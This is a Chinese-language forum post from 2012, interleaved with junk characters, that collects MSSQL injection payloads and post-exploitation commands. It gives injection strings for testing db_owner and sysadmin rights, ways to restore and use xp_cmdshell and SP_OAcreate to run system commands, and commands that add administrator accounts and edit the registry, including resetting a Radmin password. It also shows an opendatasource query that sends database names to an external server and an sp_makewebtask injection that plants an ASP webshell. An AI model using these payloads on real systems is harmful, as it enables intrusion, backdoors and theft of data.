//看看是什么权限的/ n1 z- |4 h: Q1 U! f2 n# ^
and 1=(Select IS_MEMBER('db_owner'))
$ p, `2 _4 c) i' }6 b& \And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--" `) j4 A) M" @6 x& i$ Q& h; ?
6 Q! X1 D! G5 x. z( m//检测是否有读取某数据库的权限
9 C: Q% g6 p7 T9 Zand 1= (Select HAS_DBACCESS('master'))
1 _: y( T3 q; n6 EAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --3 p, s( @+ A7 @5 `
- M8 i" N# j) w( h/ ?. s
* |9 r; f& r0 q# v* N* f* B1 T: G; p) m
数字类型
: M/ d) W E: t5 ]! ? Eand char(124)%2Buser%2Bchar(124)=0
; y/ x3 S6 \4 D& i" E# Y N# A ?" L' l9 B
字符类型$ ? m' G8 m( l# h% i( q
' and char(124)%2Buser%2Bchar(124)=0 and ''='2 `+ @- Z) R. V1 t' |4 f: m
6 [4 Q. p& x; }( R
搜索类型
' i1 f% _/ B7 y; \- H' and char(124)%2Buser%2Bchar(124)=0 and '%'='
- }5 x% c" c7 R% ^& R# z/ K5 V: {, z `
# e" M9 O5 E" s6 f爆用户名
2 ^: }& ]2 U: ^# {3 Band user>0
& N- H4 z6 i; E W x' and user>0 and ''=': _6 s1 Q5 \, A% Y& z$ W! ]
# X. Z D! ]; |& X! L4 l检测是否为SA权限
# z) @2 p3 g( J' M8 }and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
. K' Z2 h& X+ w/ |- YAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
+ d+ \$ c5 K: F0 [7 ]* n
7 @5 R+ M1 T/ J) H( U检测是不是MSSQL数据库
) S S( X) |' S2 s% M! v5 H% b5 cand exists (select * from sysobjects);--
5 ?9 Q0 _# j* w
1 V) ]6 H4 y* ~7 {检测是否支持多行
2 \4 `2 M. X2 u( V# {;declare @d int;--
7 x% z; S0 y$ w% L; W+ \5 {; M! Z
6 }* r% O6 { m7 a5 c, Q4 T恢复 xp_cmdshell& M% ?/ b' F& R
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--9 d9 ?3 R" R# T: v' w( P2 C
& d# q* X6 A$ m9 ^* i2 q
M: ?4 Q# V" @1 Z! N1 j* Bselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version'). o3 e* y( j7 ^2 W. w% U* @
' c8 E+ |1 @; T" G& l5 S8 B//-----------------------
. v: c2 W! A( H2 C! q/ `// 执行命令6 V0 C/ E5 @# N* k1 b& n! [2 o& x
//-----------------------
( H" x7 w4 [: @首先开启沙盘模式:9 \) X" {4 C! C) O7 b; v( G
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1% L& r: S, V9 k' @
! w8 D8 B. v! I/ p/ _$ p
然后利用jet.oledb执行系统命令
2 y6 h( s1 B$ q! t+ lselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
: K1 t+ I) y4 b6 ~9 y4 X( r" O5 d3 @4 F& n8 |( ^$ E% i* f m
执行命令. ?5 D! H/ S1 P# c# z3 D7 J
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
& {: j" q7 h$ _1 `( R/ [" p( ]0 R
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
# M/ m: L7 M. j+ a& X" C a9 T/ x% v& c5 _" J! Z: v V( ?! N7 h
判断xp_cmdshell扩展存储过程是否存在:
8 y3 o5 V2 V/ @8 |! y0 e* q: h7 Uhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')& [; J. {0 D7 R( u |. a
! W3 b9 s4 K9 ^1 @写注册表2 W" j h8 V% y
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',15 q# C3 v8 M# i+ @5 F
& _' K. ?. P: a8 x0 m
REG_SZ- w9 B% W& c. S [, d! Z9 q6 W
8 Z4 ~8 R# ], R
读注册表6 e0 V/ G2 ?0 z- Z g
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
, w9 y, u; ~) O! m4 U% X7 T0 P% O/ J* q+ ^! Z) h4 \6 `
读取目录内容0 o% @7 i" ]! Y+ C, ~* N
exec master..xp_dirtree 'c:\winnt\system32\',1,1
3 ?: V/ X! P8 M& ^ S3 P' o
1 h9 U& _# {; Y% Y) {( S4 U0 H7 u4 G
数据库备份
4 T$ t6 B* C7 ^5 d% E, Ubackup database pubs to disk = 'c:\123.bak' c8 t5 [& D6 q
4 G7 \3 [. _/ j4 \+ W0 s//爆出长度 }% `7 S+ X, o7 |& C2 p
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--/ V3 P: E8 ?" d3 L% s
5 `/ w/ d; a- D; o/ F
5 c# ^! y6 g+ b
, M/ F9 O* |, R: a7 E2 Z# L5 s+ u更改sa口令方法:用sql综合利用工具连接后,执行命令: c6 ]0 s$ }+ q9 M4 \/ u/ z5 o8 t9 t. ?
exec sp_password NULL,'新密码','sa'
' U: I- }& e2 _5 I G1 w: [
# ~, d( N7 j: ~. S: h& c2 ^- `; X添加和删除一个SA权限的用户test:
2 \, }0 N/ S4 P0 cexec master.dbo.sp_addlogin test,9530772
3 y7 h# |$ V0 Y, c+ w8 X2 G g4 ?exec master.dbo.sp_addsrvrolemember test,sysadmin
9 I* D0 M* h3 C! c W& o# j5 q, y9 q
删除扩展存储过过程xp_cmdshell的语句:
# H& c& I1 p/ Z+ y& e. ?exec sp_dropextendedproc 'xp_cmdshell'4 K, L5 F" H- R3 O# L6 G
1 a) h2 \' r+ `9 S) ^: s$ L1 \
添加扩展存储过过程) x" |! h: a6 ?$ n2 i2 d
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
% @/ c$ d2 _- b$ I2 ]9 lGRANT exec On xp_proxiedadata TO public4 V- k! v, H% `
! T/ M0 F. L) u- v7 c
5 a* o+ g E, K4 |" J停掉或激活某个服务。
) }5 ]; J& U: o; Y( A8 k. I. @, \/ v0 u6 m9 Q
exec master..xp_servicecontrol 'stop','schedule'. G* b% e u' v/ L2 m5 X
exec master..xp_servicecontrol 'start','schedule'' H+ Z' I# X2 Y f
9 K5 c5 u/ s# l& {+ n# ~dbo.xp_subdirs$ E* B& C9 \; d: A# k" C1 c) i* e
u5 I- X5 h$ j7 h! D6 v9 B9 _
只列某个目录下的子目录。, D, i( J8 ]9 L
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'1 P1 y3 C. x+ ~, `( e |* w
9 ?) v$ S, l [5 s- z: E3 @6 _dbo.xp_makecab& P$ T, G2 h; M( E9 }; O( m
+ n) A" b/ j0 f2 z1 S将目标多个档案压缩到某个目标档案之内。& j, u! a3 T9 E5 @
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
$ O# b+ e6 m+ O# D4 I, N9 z6 X5 r, \+ X" U1 t2 f- B1 Q
dbo.xp_makecab( [8 j) t( K: h# ^2 s" j& A7 ]
'c:\test.cab','mszip',1,/ \8 G, x; u) R8 c
'C:\Inetpub\wwwroot\SQLInject\login.asp',; _2 s" n) x& v: L. g- A9 V
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
: I2 W1 b; E- F- S; J7 ?" T# x
9 u# H5 ?9 ]( q% g/ M J3 Cxp_terminate_process
O& ]1 T8 S; J" k) g4 a! c) l8 F+ }; K+ r- d1 t" U- S8 ?
停掉某个执行中的程序,但赋予的参数是 Process ID。
3 Z) U# W& `* m: {( z, F利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
! _! J8 o# y: d# B6 o7 O
3 c! Y- V! v& t6 N0 X. a! Vxp_terminate_process 24841 r6 K- W: T, k# R; L- f7 D# u
& V# Y/ O) l+ Rxp_unpackcab4 u4 \$ G2 ^/ r' K" |; D1 j9 N
# P! p% b' u9 y" R解开压缩档。
7 w1 G' M* T3 P3 a4 H7 Y+ |
+ a: r0 o# k" _8 l7 M0 mxp_unpackcab 'c:\test.cab','c:\temp',1
7 |2 J# V: _. D; o: g$ b: t2 C. X @$ t% D; S& V1 l
_6 Y$ ^0 ^1 y R/ f6 R |- D( n某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
& S+ y5 D' q5 f* V1 H L6 O' e0 T9 e# N0 b) `8 `
create database lcx;/ k! `1 j- }0 m9 O9 I1 D; l
Create TABLE ku(name nvarchar(256) null);
0 {# C. [4 x* P2 E W' J, vCreate TABLE biao(id int NULL,name nvarchar(256) null);
& H; s1 k, t7 W, ^# |9 H: y5 X# v% D4 E, S- l! B2 f) F7 ]
//得到数据库名
/ _) d6 @5 n& w4 s6 K2 z+ Dinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases- q1 w. @$ {3 y4 |' O; ]
* P' x& v! _0 V( S3 O, a5 I. a4 {$ f
//在Master中创建表,看看权限怎样
' v7 p4 | y; N* F/ rCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
- _, O; h$ m- l( y3 Q' _% Y* J' I/ p; F4 J- Q$ C
用 sp_makewebtask直接在web目录里写入一句话马:
+ H' t/ G0 J2 _4 ^7 S+ @/ }http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--6 w# _( k: p( N$ K. L+ }- S3 O
F& Q, d( \4 W% k& k d, D0 h# R* c; ]
//更新表内容3 U& r& X& v, t9 i: X. n+ b. _6 W4 c1 G
Update films SET kind = 'Dramatic' Where id = 123
. t+ b2 `; v" ~& x5 i u7 B2 Z/ x9 I+ f* ^# I d4 Y! q
//删除内容) L" B C. Q9 s* v. ^
delete from table_name where Stockid = 3 |
发表于 2012-9-15 14:40:13
收藏
支持
反对